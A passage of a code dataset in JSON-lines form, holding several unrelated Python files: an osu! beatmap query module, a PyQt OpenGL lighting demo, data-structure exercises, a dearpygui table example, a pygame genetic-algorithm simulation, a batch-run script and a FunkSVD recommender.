create_hit_object_entry(bm_id, data):\n \"\"\"\n Create and save a HitObject entry.\n\n Equivalent to: INSERT INTO beatmap_hitobject (fields) VALUES (values);\n\n Args:\n bm_id (str): The id of the beatmap associated.\n data (List(str)): The beatmap data as a list of strings.\n\n Returns:\n hit_object_model(HitObject): The created HitObject instance.\n \"\"\"\n if HitObject.objects.filter(beatmap_id=bm_id).exists():\n return\n\n # Syntax: x,y,time,type,hitSound...,extras\n # For our purposes, we only need the time field\n hit_object_fields = {}\n hit_object_fields['beatmap_id'] = bm_id\n hit_object_fields['x_coords'] = []\n hit_object_fields['y_coords'] = []\n hit_object_fields['hit_object_times'] = []\n hit_object_fields['hit_object_types'] = []\n\n is_hit_object = False\n\n for line in data:\n if line.strip() == '[HitObjects]':\n is_hit_object = True\n continue\n\n if is_hit_object:\n if not line.strip():\n is_hit_object = False\n else:\n x = line.split(',')[0]\n hit_object_fields['x_coords'].append(x)\n y = line.split(',')[1]\n hit_object_fields['y_coords'].append(y)\n obj_time = line.split(',')[2]\n hit_object_fields['hit_object_times'].append(obj_time)\n obj_type = line.split(',')[3]\n hit_object_fields['hit_object_types'].append(obj_type)\n\n hit_object_entry = HitObject(**hit_object_fields)\n hit_object_entry.save()\n\n\ndef select_hit_object_field(beatmap_id, field):\n \"\"\"\n Returns the value of the field of a specific HitObject entry.\n\n Equivalent to: SELECT field FROM beatmap_hitobject WHERE beatmap_id = beatmap_id;\n\n Args:\n beatmap_id (str): The id of the beatmap, given by osu!api.\n\n Returns:\n field: The field requested.\n Is of type: List(Decimal).\n \"\"\"\n\n valid_keys = set([\n 'x_coords',\n 'y_coords',\n 'hit_object_times',\n ])\n\n if field not in valid_keys:\n # Raise a proper exception\n return None\n\n hitobject = HitObject.objects.get(beatmap_id=beatmap_id)\n return getattr(hitobject, field)\n\n\ndef create_beatmap_entry(json_resp):\n \"\"\"\n Given a beatmap's API response as JSON,\n populate the database with the appropriate information.\n\n Args:\n json_resp (dict): The response from osu!api\n \"\"\"\n bm_id = json_resp['beatmap_id']\n\n if Beatmap.objects.filter(beatmap_id=bm_id).exists():\n return\n\n # Download beatmap file\n OSU_BEATMAP_ENDPOINT = 'https://osu.ppy.sh/osu/'\n response = get(OSU_BEATMAP_ENDPOINT + bm_id)\n\n with open(bm_id + '.osu', 'wb') as f:\n f.write(response.content)\n\n with open(bm_id + '.osu', 'r') as f:\n data = f.readlines()\n\n # Parse beatmap file for required data\n beatmap_fields = {}\n\n beatmap_fields['beatmap_id'] = bm_id\n\n beatmap_fields['song_title'] = json_resp['title']\n beatmap_fields['song_artist'] = json_resp['artist']\n beatmap_fields['beatmap_creator'] = json_resp['creator']\n beatmap_fields['beatmap_difficulty'] = json_resp['version']\n beatmap_fields['beatmap_cs'] = Decimal(json_resp['diff_size'])\n beatmap_fields['beatmap_od'] = Decimal(json_resp['diff_overall'])\n\n # Create and get model fields\n create_break_period_entry(bm_id, data)\n beatmap_fields['break_period'] = BreakPeriod.objects.get(beatmap_id=bm_id)\n create_timing_point_entry(bm_id, data)\n beatmap_fields['timing_point'] = TimingPoint.objects.get(beatmap_id=bm_id)\n create_hit_object_entry(bm_id, data)\n beatmap_fields['hit_object'] = HitObject.objects.get(beatmap_id=bm_id)\n\n # Create Beatmap model instance and save to DB\n beatmap_entry = Beatmap(**beatmap_fields)\n beatmap_entry.save()\n\n\ndef select_beatmap_field(beatmap_id, field):\n \"\"\"\n Returns the value of the field of a specific Beatmap entry.\n\n Equivalent to: SELECT field FROM beatmap_beatmap WHERE beatmap_id = beatmap_id;\n\n Args:\n beatmap_id (str): The id of the beatmap, given by osu!api.\n\n Returns:\n field: The field requested.\n Is of type: TimingPoint, HitObject, str, Decimal.\n \"\"\"\n\n valid_keys = set([\n 'break_period',\n 'timing_point',\n 'hit_object',\n 'beatmap_creator',\n 'beatmap_difficulty',\n 'beatmap_cs',\n 'beatmap_od',\n 'song_title',\n 'song_artist',\n ])\n\n if field not in valid_keys:\n # Raise a proper exception\n return None\n\n beatmap = Beatmap.objects.get(beatmap_id=beatmap_id)\n return getattr(beatmap, field)\n","sub_path":"osu_acc/replay/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":15790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"173734479","text":"from PyQt5 import QtGui, QtCore, QtWidgets\nimport numpy as np\nfrom ctypes import c_float, c_uint, sizeof\nimport time\n\nfrom camera import CameraMovement, Camera\n\nGLfloat = c_float\nGLuint = c_uint\n\nWIDTH = 800\nHEIGHT = 600\n\n# camera\ncamera = Camera(position = QtGui.QVector3D(0., 0., 3.), \n up = QtGui.QVector3D(0., 1., 0.))\n\nfirstMouse = True\nlastX = WIDTH / 2.0\nlastY = HEIGHT / 2.0\n\n# timing\ndateTime = 0. # time between current frame and last frame\nlastFrame = 0.\n\nlightPos = QtGui.QVector3D(12., 20., -2.)\n\nclass Window(QtGui.QOpenGLWindow):\n \n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n self.setTitle('LearnOpenGL')\n \n self.vertices = np.array(\n [[-0.5, -0.5, -0.5, 0.0, 0.0, -1.0],\n [ 0.5, -0.5, -0.5, 0.0, 0.0, -1.0],\n [ 0.5, 0.5, -0.5, 0.0, 0.0, -1.0],\n [ 0.5, 0.5, -0.5, 0.0, 0.0, -1.0],\n [-0.5, 0.5, -0.5, 0.0, 0.0, -1.0],\n [-0.5, -0.5, -0.5, 0.0, 0.0, -1.0],\n\n [-0.5, -0.5, 0.5, 0.0, 0.0, 1.0],\n [ 0.5, -0.5, 0.5, 0.0, 0.0, 1.0],\n [ 0.5, 0.5, 0.5, 0.0, 0.0, 1.0],\n [ 0.5, 0.5, 0.5, 0.0, 0.0, 1.0],\n [-0.5, 0.5, 0.5, 0.0, 0.0, 1.0],\n [-0.5, -0.5, 0.5, 0.0, 0.0, 1.0],\n\n [-0.5, 0.5, 0.5, -1.0, 0.0, 0.0],\n [-0.5, 0.5, -0.5, -1.0, 0.0, 0.0],\n [-0.5, -0.5, -0.5, -1.0, 0.0, 0.0],\n [-0.5, -0.5, -0.5, -1.0, 0.0, 0.0],\n [-0.5, -0.5, 0.5, -1.0, 0.0, 0.0],\n [-0.5, 0.5, 0.5, -1.0, 0.0, 0.0],\n\n [ 0.5, 0.5, 0.5, 1.0, 0.0, 0.0],\n [ 0.5, 0.5, -0.5, 1.0, 0.0, 0.0],\n [ 0.5, -0.5, -0.5, 1.0, 0.0, 0.0],\n [ 0.5, -0.5, -0.5, 1.0, 0.0, 0.0],\n [ 0.5, -0.5, 0.5, 1.0, 0.0, 0.0],\n [ 0.5, 0.5, 0.5, 1.0, 0.0, 0.0],\n\n [-0.5, -0.5, -0.5, 0.0, -1.0, 0.0],\n [ 0.5, -0.5, -0.5, 0.0, -1.0, 0.0],\n [ 0.5, -0.5, 0.5, 0.0, -1.0, 0.0],\n [ 0.5, -0.5, 0.5, 0.0, -1.0, 0.0],\n [-0.5, -0.5, 0.5, 0.0, -1.0, 0.0],\n [-0.5, -0.5, -0.5, 0.0, -1.0, 0.0],\n\n [-0.5, 0.5, -0.5, 0.0, 1.0, 0.0],\n [ 0.5, 0.5, -0.5, 0.0, 1.0, 0.0],\n [ 0.5, 0.5, 0.5, 0.0, 1.0, 0.0],\n [ 0.5, 0.5, 0.5, 0.0, 1.0, 0.0],\n [-0.5, 0.5, 0.5, 0.0, 1.0, 0.0],\n [-0.5, 0.5, -0.5, 0.0, 1.0, 0.0]], dtype=GLfloat\n )\n \n def initializeGL(self):\n self.gl = self.context().versionFunctions()\n self.gl.glViewport(0, 0, WIDTH, HEIGHT)\n self.gl.glEnable(self.gl.GL_DEPTH_TEST)\n self.gl.glClearColor(0.1, 0.1, 0.1, 1.)\n \n ########################################################\n # Create a shader program\n \n self.lightingShaderProg = QtGui.QOpenGLShaderProgram()\n self.lightingShaderProg.create()\n self.lightingShaderProg.addShaderFromSourceFile(\n QtGui.QOpenGLShader.Vertex, '2.1.basic_lighting.vert')\n self.lightingShaderProg.addShaderFromSourceFile(\n QtGui.QOpenGLShader.Fragment, '2.1.basic_lighting.frag')\n self.lightingShaderProg.link()\n ########################################################\n \n ########################################################\n # Create a shader program\n \n self.lampShaderProg = QtGui.QOpenGLShaderProgram()\n self.lampShaderProg.create()\n self.lampShaderProg.addShaderFromSourceFile(\n QtGui.QOpenGLShader.Vertex, '2.1.lamp.vert')\n self.lampShaderProg.addShaderFromSourceFile(\n QtGui.QOpenGLShader.Fragment, '2.1.lamp.frag')\n self.lampShaderProg.link()\n ########################################################\n \n \n ########################################################\n # create a Vertex Array Object with vertice information\n \n self.cubeVAO = QtGui.QOpenGLVertexArrayObject()\n self.cubeVAO.create()\n self.cubeVAO.bind()\n \n VBO = QtGui.QOpenGLBuffer(QtGui.QOpenGLBuffer.VertexBuffer)\n VBO.create()\n VBO.setUsagePattern(QtGui.QOpenGLBuffer.StaticDraw)\n data = self.vertices.tostring()\n VBO.bind()\n VBO.allocate(data, len(data))\n self.gl.glVertexAttribPointer(0, 3, self.gl.GL_FLOAT, \n self.gl.GL_FALSE, 6*sizeof(GLfloat), 0)\n self.gl.glEnableVertexAttribArray(0)\n self.gl.glVertexAttribPointer(1, 3, self.gl.GL_FLOAT, \n self.gl.GL_FALSE, 6*sizeof(GLfloat), 0)\n self.gl.glEnableVertexAttribArray(1)\n \n VBO.release()\n self.cubeVAO.release()\n ########################################################\n \n ########################################################\n # create a Vertex Array Object with vertice information\n \n self.lightVAO = QtGui.QOpenGLVertexArrayObject()\n self.lightVAO.create()\n self.lightVAO.bind()\n \n VBO.bind()\n self.gl.glVertexAttribPointer(0, 3, self.gl.GL_FLOAT, \n self.gl.GL_FALSE, 6*sizeof(GLfloat), 0)\n self.gl.glEnableVertexAttribArray(0)\n \n VBO.release()\n self.lightVAO.release()\n ########################################################\n \n def paintGL(self):\n currentFrame = time.time()\n global deltaTime, lastFrame\n deltaTime = currentFrame - lastFrame\n lastFrame = currentFrame\n \n self.gl.glClear(self.gl.GL_COLOR_BUFFER_BIT | \\\n self.gl.GL_DEPTH_BUFFER_BIT)\n \n self.lightingShaderProg.bind()\n self.lightingShaderProg.setUniformValue('objectColor', 1., 0.5, 0.31)\n self.lightingShaderProg.setUniformValue('lightColor', 1., 1., 1.)\n self.lightingShaderProg.setUniformValue('lightPos', lightPos)\n projection = QtGui.QMatrix4x4()\n projection.perspective(camera.zoom, WIDTH/HEIGHT, 0.1, 100.)\n self.lightingShaderProg.setUniformValue('projection', projection)\n self.lightingShaderProg.setUniformValue('view', camera.viewMatrix)\n self.lightingShaderProg.setUniformValue('model', QtGui.QMatrix4x4())\n\n self.cubeVAO.bind()\n self.gl.glDrawArrays(self.gl.GL_TRIANGLES, 0, 36)\n \n self.lampShaderProg.bind()\n self.lampShaderProg.setUniformValue('projection', projection)\n self.lampShaderProg.setUniformValue('view', camera.viewMatrix)\n model = QtGui.QMatrix4x4()\n model.translate(lightPos)\n model.scale(0.2)\n self.lampShaderProg.setUniformValue('model', model)\n\n self.lightVAO.bind()\n self.gl.glDrawArrays(self.gl.GL_TRIANGLES, 0, 36)\n \n self.update()\n \n def keyPressEvent(self, event):\n global deltaTime\n \n if event.key() == QtCore.Qt.Key_Escape:\n sys.exit()\n elif event.key() == QtCore.Qt.Key_W:\n camera.processKeyboard(CameraMovement.FORWARD, deltaTime)\n elif event.key() == QtCore.Qt.Key_S:\n camera.processKeyboard(CameraMovement.BACKWARD, deltaTime)\n elif event.key() == QtCore.Qt.Key_A:\n camera.processKeyboard(CameraMovement.LEFT, deltaTime)\n elif event.key() == QtCore.Qt.Key_D:\n camera.processKeyboard(CameraMovement.RIGHT, deltaTime)\n \n event.accept()\n \n def mouseMoveEvent(self, event):\n global firstMouse, lastX, lastY\n \n if firstMouse:\n lastX, lastY = event.globalX(), event.globalY()\n firstMouse = False\n \n xoffset = event.globalX() - lastX\n yoffset = lastY - event.globalY()\n lastX, lastY = event.globalX(), event.globalY()\n \n camera.processMouseMovement(xoffset, yoffset)\n event.accept()\n \n def wheelEvent(self, event):\n camera.processMouseScroll(event.angleDelta().y())\n event.accept()\n \n def closeEvent(self, event):\n sys.exit()\n event.accept()\n\n\nif __name__ == '__main__':\n import sys\n \n # Set format here, otherwise it throws error\n # `QCocoaGLContext: Falling back to unshared context.`\n # on Mac when use QOpenGLWidgets\n # https://doc.qt.io/qt-5/qopenglwidget.html#details last paragraph\n format = QtGui.QSurfaceFormat()\n format.setRenderableType(QtGui.QSurfaceFormat.OpenGL)\n format.setProfile(QtGui.QSurfaceFormat.CoreProfile)\n format.setVersion(4, 1)\n format.setDepthBufferSize(24)\n QtGui.QSurfaceFormat.setDefaultFormat(format)\n \n app = QtWidgets.QApplication(sys.argv)\n \n window = Window()\n window.resize(WIDTH, HEIGHT)\n window.show()\n \n sys.exit(app.exec_())\n","sub_path":"OpenGL/Joey_de_Vries/qopengl/01_lighting/02_basic_lighting/part02_diffuse_lighting/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"446394130","text":"class node():\n\tdef __init__(self, data = None, link = None):\n\t\tself.data = data\n\t\tself.link = link\n\nclass SLL():\n\tdef __init__(self, head = None):\n\t\tself.head = head\n\n\tdef append(self, data):\n\t\tnewnode = node(data)\n\t\t\n\t\tif self.head == None:\n\t\t\thead = newnode\n\t\t\treturn\n\t\ttemp = self.head\n\t\twhile temp.link:\n\t\t\ttemp = temp.link\n\n\t\ttemp.link = newnode\n\n\tdef push(self, data):\n\t\tnewnode = node(data)\n\t\tif self.head == None:\n\t\t\tself.head = newnode\n\t\t\treturn\n\t\tnewnode.link = self.head\n\t\tself.head = newnode\n\n\tdef popLast(self):\n\t\tif self.head == None:\n\t\t\traise ValueError('Linked List is NULL')\n\t\ttemp = self.head\n\t\t\n\t\twhile temp.link.link:\n\t\t\ttemp = temp.link\n\n\t\tvalue = temp.link.data\n\t\ttemp.link = None\n\t\treturn value\n\n\tdef popFront(self):\n\t\tif self.head == None:\n\t\t\traise ValueError('Linked List is Null')\n\t\tvalue = self.head.data\n\t\tself.head = self.head.link\n\t\treturn value\n\n\tdef printList(self):\n\t\ttemp = self.head\n\t\twhile temp:\n\t\t\tprint(temp.data)\n\t\t\ttemp = temp.link\n\t\t \n\n","sub_path":"easy_ds/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"580481647","text":"# Given the root of a binary tree, invert the tree, and return its root.\n# Input: root = [4,2,7,1,3,6,9]\n# Output: [4,7,2,9,6,3,1]\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:\n if root:\n if root.left!=None and root.right!=None:\n rootTemp=TreeNode()\n rootTemp=root.left\n root.left=root.right\n root.right=rootTemp\n self.invertTree(root.left)\n self.invertTree(root.right)\n elif root.left!=None and root.right==None:\n root.right=root.left\n root.left=None\n self.invertTree(root.right)\n elif root.left==None and root.right!=None:\n root.left=root.right\n root.right=None\n self.invertTree(root.left)\n return root\n return root \n ","sub_path":"InvertBinaryTree.py","file_name":"InvertBinaryTree.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"199309632","text":"import dearpygui.dearpygui as dpg\n\ndpg.create_context()\n\n\n# def clipper_toggle(sender):\n# dpg.configure_item(\"table_clip\", clipper=dpg.get_value(sender))\n\n\nwith dpg.window(label=\"Tutorial\"):\n # dpg.add_checkbox(label=\"clipper\", callback=clipper_toggle, default_value=True)\n\n with dpg.table(header_row=False, tag=\"table_clip\", clipper=True):\n\n for i in range(5):\n dpg.add_table_column()\n\n for i in range(30000):\n with dpg.table_row():\n for j in range(5):\n dpg.add_text(f\"Row{i} Column{j}\")\n\ndpg.show_metrics()\n\ndpg.create_viewport(title='Custom Title', width=800, height=600)\ndpg.setup_dearpygui()\ndpg.show_viewport()\ndpg.start_dearpygui()\ndpg.destroy_context()\n","sub_path":"CS/Programming_Languages/Python/Modules/exterior/topics/gui/dearPyGUI/documentation/_24_tables/_24_9_clipping/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"383028975","text":"import pygame\nfrom Ship import Ship\nfrom Target import Target\nfrom Rectangle import Rectangle\nfrom colors import *\nimport random\nimport math\nimport time\n\npygame.init()\n\n\nscreen = pygame.display.set_mode([1000, 800])\ndone = False\nclock = pygame.time.Clock()\nrandom.seed()\n\nspeed_simulation = 5\n\niteration = 100\nduration = 5. / speed_simulation\ngenome_size = 4\nsize_pop = 100\nsize_surviving_pop = size_pop // 2\n\nstate = 0\ntarget = Target(screen, 700, 500)\nrect1 = Rectangle(screen, 550, 350, 200, 20, -45)\nrect2 = Rectangle(screen, 350, 350, 200, 20, 45)\nrect3 = Rectangle(screen, 650, 450, 200, 20, -45)\nobstacles = [rect1, rect2]\nships = []\nspeed = 6\n\nmax_score_all_time = 0\n\n\ndef gen_ships():\n for k in range(0, size_pop):\n ship = Ship(screen)\n ship.genome = [(random.randrange(2*speed_simulation, 8*speed_simulation),\n random.randrange(-180, 180))] +\\\n [(random.randrange(2*speed_simulation, 8*speed_simulation),\n random.randrange(-160, 160))\n for i in range(genome_size-1)]\n ship.setSpeed(ship.genome[0][0], ship.genome[0][1])\n ship.setObstacles(obstacles)\n ships.append(ship)\n return ships\n\n\ndef select_ships():\n ships.sort(key=lambda s: s.score, reverse=True)\n return ships[:size_surviving_pop]\n\n\ndef mutations():\n for i, ship in enumerate(ships):\n ships[i].genome = [(g[0] + ((j+1*genome_size)/(2*genome_size))*(random.randrange(0, 100)/100. - 0.5)/speed_simulation*(1+ships[i].score**2+0.4*ships[i].score**3),\n g[1] + ((j+1*genome_size)/(2*genome_size))*(random.randrange(-10, 10))/(0.5+ships[i].score**2+ships[i].score**3))\n for j, g in enumerate(ships[i].genome)]\n return ships\n\n\ndef duplicate():\n for k in range(size_pop - size_surviving_pop):\n ship = Ship(screen)\n ship.copy(ships[k % size_surviving_pop])\n ships.append(ship)\n return ships\n\n\ndef reinit():\n for ship in ships:\n ship.init_position()\n return ships\n\n\ndef draw():\n for ship in ships:\n ship.draw()\n\n\ndef setSpeed(state):\n for ship in ships:\n ship.setSpeed(ship.genome[min(state, len(ship.genome)-1)][0], ship.genome[min(state, len(ship.genome)-1)][1])\n\n\ndef move():\n for ship in ships:\n ship.move()\n\n\ndef score(max_score_all_time):\n for ship in ships:\n ship.scoring(target)\n max_score = max(ship.score for ship in ships)\n if max_score > max_score_all_time:\n max_score_all_time = max_score\n for ship in ships:\n ship.score /= max_score\n return max_score_all_time\n\n\ndef all_ships_out():\n all_out = True\n for ship in ships:\n if ship.vx != 0 or ship.vy != 0:\n all_out = False\n return all_out\n\n\nships = gen_ships()\nt = time.clock()\nwhile not done:\n clock.tick(60)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n screen.fill(WHITE)\n for obst in obstacles:\n obst.draw()\n target.draw()\n draw()\n move()\n pygame.display.flip()\n if (time.clock() -t > state*duration/(genome_size+1)):\n setSpeed(state)\n state += 1\n\n if (all_ships_out() or time.clock() - t > duration) and iteration > 0:\n iteration -= 1\n state = 0\n max_score_all_time = score(max_score_all_time)\n ships = select_ships()\n ships = duplicate()\n ships = mutations()\n ships = reinit()\n setSpeed(0)\n t = time.clock()\n # ships = gen_ships()\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"79371473","text":"import os\n\n#Parameters:\nks = ['4', '5', '6', '7', 'all']\nks = ['all']\nCs = ['1', '0.1', '2']\n#Cs = ['1', '10']\nkernels = ['rbf', 'sigmoid']\n#kernels = ['sigmoid']\ngammas = ['0.0', '1', '10']\n\ntrainset = '../../corpora/cwi_paetzold_training'\ntestset = '../../corpora/cwi_paetzold_testing'\nfor C in Cs:\n\tfor kernel in kernels:\n\t\tfor g in gammas:\n\t\t\tfor k in ks:\n\t\t\t\toutput = '../../labels/shardlow/labels_Shardlow_'+C+'_'+kernel+'_'+g+'_'+k\n\t\t\t\tcomm = 'nohup python Run_Shardlow.py '+trainset+' '+k+' '+C+' '+kernel+' 3 '+g+' 0.0 '+testset+' '+output+' &'\n\t\t\t\tos.system(comm)\n","sub_path":"cwi_separated_classes/scripts/identifiers/Run_All_Shardlow.py","file_name":"Run_All_Shardlow.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"245557223","text":"from scipy import signal\nimport scipy\nimport numpy as np\n\nNPERSEG = 1024 * 2\nL = 60\nNFFT = NPERSEG\n\n\ndef getTFFT(length, nperseg=NPERSEG):\n r = 1.0 / 8\n return (length - int(r * nperseg)) // (int(7 * r * nperseg))\n\n\ndef sp3(x, nfft=NFFT, nperseg=NPERSEG):\n Fs = 44100\n _, _, f = signal.spectrogram(x[:, 0], Fs, nfft=nfft, nperseg=nperseg)\n return f\n\n\ndef psp3(f):\n\n y = np.log10(f + 1)\n return y * 5e4\n\n y = 10 * np.log10(f + 1e-30) # 1e-10\n return y / 200.0 * 3 + 1.7 # ????????\n\n\ndef hz2mel(hz):\n \"\"\"Convert a value in Hertz to Mels\n :param hz: a value in Hz. This can also be a numpy array, conversion proceeds element-wise.\n :returns: a value in Mels. If an array was passed in, an identical sized array is returned.\n \"\"\"\n return 2595 * np.log10(1 + hz / 700.0)\n\n\ndef mel2hz(mel):\n \"\"\"Convert a value in Mels to Hertz\n :param mel: a value in Mels. This can also be a numpy array, conversion proceeds element-wise.\n :returns: a value in Hertz. If an array was passed in, an identical sized array is returned.\n \"\"\"\n return 700 * (10 ** (mel / 2595.0) - 1)\n\n\ndef get_filterbanks(nfilt=20, nfft=512, samplerate=16000, lowfreq=0, highfreq=None):\n \"\"\"Compute a Mel-filterbank. The filters are stored in the rows, the columns correspond\n to fft bins. The filters are returned as an array of size nfilt * (nfft/2 + 1)\n :param nfilt: the number of filters in the filterbank, default 20.\n :param nfft: the FFT size. Default is 512.\n :param samplerate: the samplerate of the signal we are working with. Affects mel spacing.\n :param lowfreq: lowest band edge of mel filters, default 0 Hz\n :param highfreq: highest band edge of mel filters, default samplerate/2\n :returns: A numpy array of size nfilt * (nfft/2 + 1) containing filterbank. Each row holds 1 filter.\n \"\"\"\n highfreq = highfreq or samplerate / 2\n assert highfreq <= samplerate / 2, \"highfreq is greater than samplerate/2\"\n\n lowmel = hz2mel(lowfreq)\n highmel = hz2mel(highfreq)\n melpoints = np.linspace(lowmel, highmel, nfilt + 2)\n bin = np.floor((nfft + 1) * mel2hz(melpoints) / samplerate)\n\n fbank = np.zeros([nfilt, nfft // 2])\n for j in range(0, nfilt):\n for i in range(int(bin[j]), int(bin[j + 1])):\n fbank[j, i] = (i - bin[j]) / (bin[j + 1] - bin[j])\n for i in range(int(bin[j + 1]), int(bin[j + 2])):\n fbank[j, i] = (bin[j + 2] - i) / (bin[j + 2] - bin[j + 1])\n return fbank\n\n\ndef create_mel_filter(\n fft_size, n_freq_components=64, start_freq=100 - 80, end_freq=1000 * 5, samplerate=44100\n):\n \"\"\"\n Creates a filter to convolve with the spectrogram to get out mels\n\n \"\"\"\n mel_inversion_filter = get_filterbanks(\n nfilt=n_freq_components,\n nfft=fft_size,\n samplerate=samplerate,\n lowfreq=start_freq,\n highfreq=end_freq,\n )\n mel_filter = mel_inversion_filter.T / mel_inversion_filter.sum(axis=1)\n\n return mel_filter, mel_inversion_filter\n\n\ndef make_mel(spectrogram, mel_filter, shorten_factor=1):\n mel_spec = np.transpose(mel_filter).dot(np.transpose(spectrogram))\n return mel_spec\n\n\nmel_filter, _ = create_mel_filter(NFFT, n_freq_components=L)\n\n\ndef shrink(magnitude, S):\n xi = np.linspace(0, magnitude.shape[0] - 1, S)\n magnitude = np.interp(xi, np.arange(magnitude.shape[0]), magnitude)\n return magnitude\n\n\ndef shrinkMel(x, mel_filter=mel_filter):\n mel = make_mel(x[1:].T, mel_filter)\n mel[np.isnan(mel)] = 0\n return mel\n\n\nclass AA(object):\n def __init__(self, nfft=NFFT, nperseg=NPERSEG):\n self.mel_filter = mel_filter\n self.nfft = nfft\n self.nperseg = nperseg\n\n def shrinkMel(self, x):\n if self.mel_filter.shape[0] != self.nperseg:\n mel_filter, _ = create_mel_filter(self.nfft, n_freq_components=L)\n return shrinkMel(x, mel_filter=mel_filter)\n\n def getTFFT(self, length):\n print(self.nperseg)\n return getTFFT(length, self.nperseg)\n\n def sp3(self, x):\n return sp3(x, nfft=self.nfft, nperseg=self.nperseg)\n","sub_path":"ailive/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"117273911","text":"#!/usr/bin/env python\nfrom __future__ import print_function, absolute_import\n\nimport logging\nimport logging.handlers\n\nimport os\nimport argparse\nimport sys\n\nimport pkg_resources\ntry:\n __version__ = pkg_resources.require(\"VermeerKAT\")[0].version\nexcept pkg_resources.DistributionNotFound:\n __version__ = \"dev\"\n\nPIPELINE_LOG = os.path.join(os.getcwd(), \"VermeerKAT.log\")\n\nclass DelayedFileHandler(logging.handlers.MemoryHandler):\n \"\"\"A DelayedFileHandler is a variation on the MemoryHandler. It will buffer up log\n entries until told to stop delaying, then dumps everything into the target file\n and from then on logs continuously. This allows the log file to be switched at startup.\"\"\"\n def __init__(self, filename, delay=True):\n logging.handlers.MemoryHandler.__init__(self, 100000, target=logging.FileHandler(filename))\n self._delay = delay\n\n def shouldFlush(self, record):\n return not self._delay\n\n def setFilename(self, filename, delay=False):\n self._delay = delay\n self.setTarget(logging.FileHandler(filename))\n if not delay:\n self.flush()\n\ndef create_logger():\n \"\"\" Create a console logger \"\"\"\n log = logging.getLogger(__name__)\n cfmt = logging.Formatter(\n ('%(name)s - %(asctime)s %(levelname)s - %(message)s'))\n log.setLevel(logging.DEBUG)\n\n filehandler = logging.FileHandler(PIPELINE_LOG)\n filehandler.setFormatter(cfmt)\n\n log.addHandler(filehandler)\n log.setLevel(logging.INFO)\n\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n console.setFormatter(cfmt)\n\n log.addHandler(console)\n return log, filehandler, console, cfmt\n\n# Create the log object\nlog, log_filehandler, log_console_handler, log_formatter = create_logger()\n\ndef remove_log_handler(hndl):\n log.removeHandler(hndl)\n\n\ndef add_log_handler(hndl):\n log.addHandler(hndl)\n\nNONCURSES = False","sub_path":"vermeerkat/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"50991425","text":"import numpy as np\nimport pickle as pkl\nimport bisect\n\n\ncwd = '/home/canbulguoglu/app'\n\n\nclass FunkSVD():\n def __init__(self, data):\n # Accepts pandas dataframe where column names are user_id, item_id and Rating\n with open(cwd+'/flask.p', 'rb') as f:\n myDicts = pkl.load(f)\n self.user_features = myDicts[0]\n self.item_features = myDicts[1]\n self.user_data = {}\n\n for each in data:\n if str(each['id']) in self.item_features:\n\n self.user_data[str(each['id'])] = float(each['rating'])/2\n\n def get_recommendation(self, howMany=20):\n\n user_predictions = self.__user_prediction_for_same_movies(\n self.user_data)\n # Find most most similar user_ids\n user_ids = FunkSVD.get_most_similar_users(\n self.user_data, user_predictions, 1)\n\n result_list = []\n # get user features for users who are most similar to given new user\n for user in user_ids:\n for item, item_feature in self.item_features.items():\n # predict ratings for most similar users\n prediction = np.dot(\n self.user_features[user], item_feature)\n bisect.insort(result_list, [prediction, item])\n\n return_list = []\n for pair in result_list:\n if len(return_list) >= 60:\n break\n if pair[1] in return_list:\n continue\n\n return_list.append(pair[1])\n np.random.shuffle(return_list)\n\n return return_list[:howMany]\n\n def __user_prediction_for_same_movies(self, user_ratings):\n result = {}\n for key in user_ratings:\n if key not in self.item_features:\n continue\n\n for user in self.user_features:\n result.setdefault(user, []).append(\n np.dot(self.user_features[user], self.item_features[key]))\n\n return result\n\n @staticmethod\n def mean_squared_difference(a, b):\n summation = 0\n n = len(a)\n for i in range(0, n):\n difference = a[i] - b[i]\n squared_difference = difference**2\n summation = summation + squared_difference\n MSE = summation/n\n\n return 1/MSE\n\n @staticmethod\n def get_most_similar_users(user_ratings, user_predictions, howMany):\n similarities = []\n\n for user, ratings in user_predictions.items():\n\n similarity = FunkSVD.mean_squared_difference(\n list(user_ratings.values()), ratings)\n\n similarities.append([user, similarity])\n\n similarities.sort(reverse=True, key=lambda x: x[1])\n\n return [each[0] for each in similarities[:howMany]]\n","sub_path":"new/app/funkrecommender.py","file_name":"funkrecommender.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"333444568","text":"import sqlite3\nconn = sqlite3.connect('test.db')\ncursor=conn.cursor()\n\n#sqlstr='insert into test values(1,\"helloworld\")'\n#cursor.execute(sqlstr)\nsqlstr='select * from test'\ndata=cursor.execute(sqlstr)\n#row=data.fetchone()\n#print(row)\nrows=data.fetchall()\nprint(rows)\n# for row in rows:\n# 